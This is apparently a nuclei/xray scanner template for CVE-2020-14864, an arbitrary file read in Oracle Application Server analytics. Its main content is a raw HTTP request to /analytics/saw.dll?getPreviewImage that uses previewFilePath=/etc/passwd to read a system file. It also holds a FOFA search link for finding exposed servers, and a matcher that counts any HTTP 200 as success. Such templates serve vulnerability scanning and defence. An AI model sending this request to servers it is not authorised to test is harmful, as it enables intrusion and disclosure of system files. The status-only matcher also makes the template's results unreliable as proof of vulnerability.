id: poc-yaml-oracle-application-server-cve-2020-14864-fileread

info:
  name: poc-yaml-oracle-application-server-cve-2020-14864-fileread
  author: y0y0
  severity: high
  tags: xray-converted,cve-2020-14864
  reference:
    - https://github.com/osamatest1/twitter.com-15203/blob/f5de5fb80be1502d9c589015e95ea405232186a4/nuclei-templates/cves/2020/CVE-2020-14864.yaml
    - https://fofa.info/result?qbase64=Ik9yYWNsZS1BcHBsaWNhdGlvbi1TZXJ2ZXIi

http:
  - raw:
      - |
        GET /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200